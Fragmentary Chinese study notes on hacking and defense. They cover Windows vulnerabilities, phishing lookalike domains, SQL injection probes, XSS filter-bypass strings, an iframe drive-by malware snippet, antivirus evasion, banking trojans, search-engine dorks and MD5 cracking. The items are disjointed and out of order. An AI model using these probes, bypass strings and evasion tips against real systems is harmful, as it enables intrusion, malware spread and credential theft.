攻防是对立并且统一的

挂代理，免费的。。。

ms12-020：3389

mysql：strcpy（）

ms08-067

MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统，包括：Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本

ms06-040

http://huaidan.org/archives/602.html

六、网络钓鱼：

www.taobeo.com

www.taobaof.com

（小葵工具，转码）

查域名：

www.nihao.net

MD5在线加密

你好万维网

增强全员安全意识

七、社会工程学：APT 

删帖：改号软件：110；版主；QQ,女孩，

反向社工：

社会工程学

八、sql注入

access+asp（脚本）

（微软）mssql

php+mysql

jsp+oracle，db2

1、注入成因：程序对用户输入的字符没有进行过滤

<scr<script>ipt>

绕过的方法<srcipt src=a.js>

sel%ect

2.判断注入点：

www.xx.com/a.asp?id=1

and 1=1 正常

and 1=2 错误  执行逻辑

www.tagu.com

3.自动工具：hdsi，nbsi2，ad，domain，pangolin：穿山甲，管中窥豹：穿WAF：WEB APP FW

SQLMAP:SQL注入-批量扫描-添加网络-批量分析-判断注入点-检测进入-开始检测-拆解表明-拆解列名-拆解内容-adminpwl内容复制-MD5拆解-破译单个密码-小写字母-开始

九：XXS跨站

挂马，盗COOKIES, XSS盲打，dos，xss蠕虫，后台添加管理员，

www.shendu.com

十：dos/ddos：拒绝服务，分布式拒绝服务

全世界的难题，防火墙完全无能为力流量，CC,智能攻击：穿专业抗dos设备：

十一、挂马：U盘摆渡：窃密，

1.内嵌式框架挂马、<iframe

src=http://ip></iframe>

数据库挂马。

3.定向挂马:www.gooann.com

4.漏洞挂马：ie，暴风，360

杀毒软件：

已知病毒：特征码，未知病毒：主动防御：行为，高启发：仿真

免杀：数字签名，区段加密，加壳（上兴5.0）

四无：无启动项，无端口，无进程，无硬盘文件，

HOOK:钩子

nedeletekey：

硬件：bios，CIH,

显卡，网卡，声卡，（黑防专用）

四、网银攻击

浮云木马，超级网银：授权，在线劫持（交易的瞬间劫持金额），网银大盗（你在做交易的时候），证书伪造，银行卡复制，UKEY：高级克隆，远程映射，内存泄露

https:ssl  443  ；ssl  strip，ssl dos（网银大盗）

5.逻辑漏洞：表示逻辑，业务逻辑（发生最多的问题），访问逻辑

银行A给B转账户1000元：

http：//member1.taobao.com/member/user_profile.

平行权限：

网购：

A：定单号：1101

B：定单号=1101删除

7.目录遍历：

产生原因：浏览目录

baidu：

inurl;qq.txt    例如：(inurl.qq.txt)

index of/ppt    

index of/xls

index of/data

密码破解：

暴力破解：

0-9，A-Z，a-z，！@#￥%

8位--23年

越复杂越好：

口令短语：

我很胖，我要减肥，我要掉10kg！

Whp，Wyjf，Wyd10kg！

密码获取：暴力破解：LC,SAMINSIDE

肩窥，sniffer，中间人攻击，社会，星号密码克星（可以获取密码），自动登录，记住密码：翻译软件：划词功能

www.263.net（灵格斯，解密工具）新浪的所有邮箱都可以使 

user：admin

pass：md5值

解密：www.xmd5.com；www.cmd5.com

彩虹表：明文  密文（黑客软件 Domain3.5  MD5C racksp）

dv_log：

username2=admin

password2=5566admin

五、COOKIES:客户端，时间限制，绕过验证,

旁注WEB综合检测系统程序 Ver3.5版

<script>alert()</script>

<><>

在功与防中寻求对立和统一

安全是相对的

一、溢出攻击

1.远程溢出

2.本地溢出

二、邮件攻击

1.密码破解：字典

2.垃圾邮件：炸弹

3.邮件钓鱼：链接，附件

4.伪装发件人

5.表单钓鱼

6.邮件跨站

三、手机攻击

小葵工具